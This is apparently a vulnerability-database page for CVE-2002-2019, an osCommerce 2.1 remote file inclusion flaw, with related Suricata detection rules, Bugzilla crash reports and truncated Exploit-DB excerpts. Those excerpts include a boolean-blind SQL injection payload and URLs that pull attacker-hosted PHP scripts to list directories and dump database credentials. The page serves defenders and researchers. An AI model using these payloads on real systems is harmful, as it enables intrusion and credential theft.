CVE-2002-2019
published 2002-12-31CVE-2002-2019: PHP remote file inclusion vulnerability in include_once.php in osCommerce (a.k.a. Exchange Project) 2.1 allows remote attackers to execute arbitrary PHP code…
PriorityP335high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.65%
83.7th percentile
PHP remote file inclusion vulnerability in include_once.php in osCommerce (a.k.a. Exchange Project) 2.1 allows remote attackers to execute arbitrary PHP code via the include_file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oscommerce | oscommerce | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL RPC portmap ypserv request UDP
suricata·2010-09-23
CVE-2000-1042 GPL RPC portmap ypserv request UDP
GPL RPC portmap ypserv request UDP
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 111 (msg:"GPL RPC portmap ypserv request UDP"; content:"|00 01 86 A0|"; depth:4; offset:12; content:"|00 00 00 03|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; content:"|00 01 86 A4|"; within:4; content:"|00 00 00 00|"; depth:4; offset:4; reference:arachnids,12; reference:bugtraq,5914; reference:bugtraq,6016; reference:cve,2000-1042; reference:cve,2000-1043; reference:cve,2002-1232; classtype:rpc-portmap-decode; sid:2100590; rev:13; metadata:created_at 2010_09_23, cve CVE_2000_1042, signature_severity Informational, updated_at 2019_07_26;)
Suricata
GPL NETBIOS DCERPC IrotIsRunning attempt
suricata·2010-09-23
CVE-2002-1561 GPL NETBIOS DCERPC IrotIsRunning attempt
GPL NETBIOS DCERPC IrotIsRunning attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC IrotIsRunning attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_test:4,>,128,0,relative; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103238; rev:4; metadata:created_at 2010_09_23, cve CVE_2002_1561, signature_severity Informational, updated_at 2019_07_26;)
Suricata
GPL EXPLOIT kadmind buffer overflow attempt
suricata·2010-09-23
CVE-2002-1226 GPL EXPLOIT kadmind buffer overflow attempt
GPL EXPLOIT kadmind buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 749 (msg:"GPL EXPLOIT kadmind buffer overflow attempt"; flow:established,to_server; content:"|00 C0 05 08 00 C0 05 08 00 C0 05 08 00 C0 05 08|"; reference:bugtraq,5731; reference:bugtraq,6024; reference:cve,2002-1226; reference:cve,2002-1235; reference:url,www.kb.cert.org/vuls/id/875073; classtype:shellcode-detect; sid:2101894; rev:9; metadata:created_at 2010_09_23, cve CVE_2002_1226, confidence High, signature_severity Major, updated_at 2019_07_26;)
Suricata
GPL SQL Slammer Worm propagation attempt
suricata·2010-09-23
CVE-2002-0649 GPL SQL Slammer Worm propagation attempt
GPL SQL Slammer Worm propagation attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"GPL SQL Slammer Worm propagation attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|"; content:"sock"; content:"send"; reference:bugtraq,5310; reference:bugtraq,5311; reference:cve,2002-0649; reference:nessus,11214; reference:url,vil.nai.com/vil/content/v_99992.htm; classtype:misc-attack; sid:2102003; rev:9; metadata:created_at 2010_09_23, cve CVE_2002_0649, confidence Medium, signature_severity Informational, updated_at 2019_07_26;)
Suricata
GPL EXPLOIT kadmind buffer overflow attempt
suricata·2010-09-23
CVE-2002-1226 GPL EXPLOIT kadmind buffer overflow attempt
GPL EXPLOIT kadmind buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 751 (msg:"GPL EXPLOIT kadmind buffer overflow attempt"; flow:established,to_server; content:"|FF FF|KADM0.0A|00 00 FB 03|"; reference:bugtraq,5731; reference:bugtraq,6024; reference:cve,2002-1226; reference:cve,2002-1235; reference:url,www.kb.cert.org/vuls/id/875073; classtype:shellcode-detect; sid:2101897; rev:9; metadata:created_at 2010_09_23, cve CVE_2002_1226, confidence High, signature_severity Major, updated_at 2019_07_26;)
Suricata
GPL FTP SITE CPWD overflow attempt
suricata·2010-09-23
CVE-2002-0826 GPL FTP SITE CPWD overflow attempt
GPL FTP SITE CPWD overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP SITE CPWD overflow attempt"; flow:established,to_server; content:"SITE"; nocase; content:"CPWD"; distance:0; nocase; isdataat:100,relative; pcre:"/^SITE\s+CPWD\s[^\n]{100}/smi"; reference:bugtraq,5427; reference:cve,2002-0826; classtype:misc-attack; sid:2101888; rev:9; metadata:created_at 2010_09_23, cve CVE_2002_0826, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL SNMP public access udp
suricata·2010-09-23
CVE-1999-0517 GPL SNMP public access udp
GPL SNMP public access udp
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 161 (msg:"GPL SNMP public access udp"; content:"public"; fast_pattern; reference:bugtraq,2112; reference:bugtraq,4088; reference:bugtraq,4089; reference:cve,1999-0517; reference:cve,2002-0012; reference:cve,2002-0013; classtype:attempted-recon; sid:2101411; rev:13; metadata:created_at 2010_09_23, cve CVE_1999_0517, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_10_08;)
Suricata
GPL SNMP private access udp
suricata·2010-09-23
CVE-2002-0012 GPL SNMP private access udp
GPL SNMP private access udp
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 161 (msg:"GPL SNMP private access udp"; content:"private"; fast_pattern; reference:bugtraq,4088; reference:bugtraq,4089; reference:bugtraq,4132; reference:bugtraq,7212; reference:cve,2002-0012; reference:cve,2002-0013; classtype:attempted-recon; sid:2101413; rev:12; metadata:created_at 2010_09_23, cve CVE_2002_0012, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_10_08;)
Suricata
GPL EXPLOIT kadmind buffer overflow attempt
suricata·2010-09-23
CVE-2002-1226 GPL EXPLOIT kadmind buffer overflow attempt
GPL EXPLOIT kadmind buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 751 (msg:"GPL EXPLOIT kadmind buffer overflow attempt"; flow:established,to_server; content:"|00 C0 05 08 00 C0 05 08 00 C0 05 08 00 C0 05 08|"; reference:bugtraq,5731; reference:bugtraq,6024; reference:cve,2002-1226; reference:cve,2002-1235; reference:url,www.kb.cert.org/vuls/id/875073; classtype:shellcode-detect; sid:2101895; rev:9; metadata:created_at 2010_09_23, cve CVE_2002_1226, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
exploitdb·2019-12-03
Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
---
# Exploit Title: Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
# Discovery by: hyp3rlinx
# Date: 2019-12-03
# Vendor Homepage: www.microsoft.com
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
[+] ISR: Apparition Security
[Vendor]
www.microsoft.com
[Product]
Microsoft Windows Media Center
Windows Media Center is a discontinued digital video recorder and media player created by Microsoft.
Media Center was first introduced to Windows in 2002 on Windows XP Media Center.
[Vulnerability Type]
XML External Entity MotW Bypass (Anniversar
Exploit-DB
Hospital-Management 1.26 - 'fname' SQL Injection
exploitdb·2019-09-18
Hospital-Management 1.26 - 'fname' SQL Injection
Hospital-Management 1.26 - 'fname' SQL Injection
---
# Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-18
# Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management
# Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip
# Tested Version: 1.26
# Tested on OS: CentOS 7
# CVE: N/A
# Discription:
# Simple SQL injection after application authentication.
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload:
fname=tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'&sname=tester&[email protected]&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add
# Type: error-based
# Title: MySQL >=
Exploit-DB
osCommerce 2.1 - Remote File Inclusion
exploitdb·2002-06-16
CVE-2002-2019 osCommerce 2.1 - Remote File Inclusion
osCommerce 2.1 - Remote File Inclusion
---
source: https://www.securityfocus.com/bid/5037/info
osCommerce is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver.
-------- Example 1 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/a.php
--- a.php ---
Output: dir listing of the current dierctory
-------- Example 2 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/b.php
--- b.php ---
Output: outputs the application_top.php file wich includes MySQL username,
password, etc.
Bugzilla
CVE-2019-15860 Xpdf: Xpdf 2.00 allows a SIGSEGV in XRef::constructXRef in XRef.cc
bugzilla·2019-10-01·CVSS 5.5
CVE-2019-15860 [MEDIUM] CVE-2019-15860 Xpdf: Xpdf 2.00 allows a SIGSEGV in XRef::constructXRef in XRef.cc
CVE-2019-15860 Xpdf: Xpdf 2.00 allows a SIGSEGV in XRef::constructXRef in XRef.cc
Xpdf 2.00 allows a SIGSEGV in XRef::constructXRef in XRef.cc. NOTE: 2.00 is a
version from November 2002.
References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15860
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15860
https://gist.github.com/RootUp/b5de893bb2e51a4c846c5a0caa13b666
Discussion:
Created xpdf tracking bugs for this issue:
Affects: epel-all [bug 1757629]
Affects: fedora-all [bug 1757628]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Bugzilla
CVE-2019-9075 binutils: heap-based buffer overflow in function _bfd_archive_64_bit_slurp_armap in archive64.c
bugzilla·2019-02-25·CVSS 7.8
CVE-2019-9075 [HIGH] CVE-2019-9075 binutils: heap-based buffer overflow in function _bfd_archive_64_bit_slurp_armap in archive64.c
CVE-2019-9075 binutils: heap-based buffer overflow in function _bfd_archive_64_bit_slurp_armap in archive64.c
An issue was discovered in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.32. It is a heap-based buffer overflow in _bfd_archive_64_bit_slurp_armap in archive64.c.
Reference:
https://sourceware.org/bugzilla/show_bug.cgi?id=24236
Discussion:
Created binutils tracking bugs for this issue:
Affects: fedora-all [bug 1680670]
---
```
==6814== Memcheck, a memory error detector
==6814== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==6814== Using Valgrind-3.14.0 and LibVEX; rerun with -h for copyright info
==6814== Command: size poc
==6814==
==6814== Invalid write of size 1
==6814== at 0x4F27D5C: _bfd_archive_64_bit_slurp_ar
http://archives.neohapsis.com/archives/bugtraq/2002-06/0188.htmlhttp://www.iss.net/security_center/static/9369.phphttp://www.oscommerce.com/about.php/news%2C72http://www.securityfocus.com/bid/5037http://archives.neohapsis.com/archives/bugtraq/2002-06/0188.htmlhttp://www.iss.net/security_center/static/9369.phphttp://www.oscommerce.com/about.php/news%2C72http://www.securityfocus.com/bid/5037
2002-12-31
Published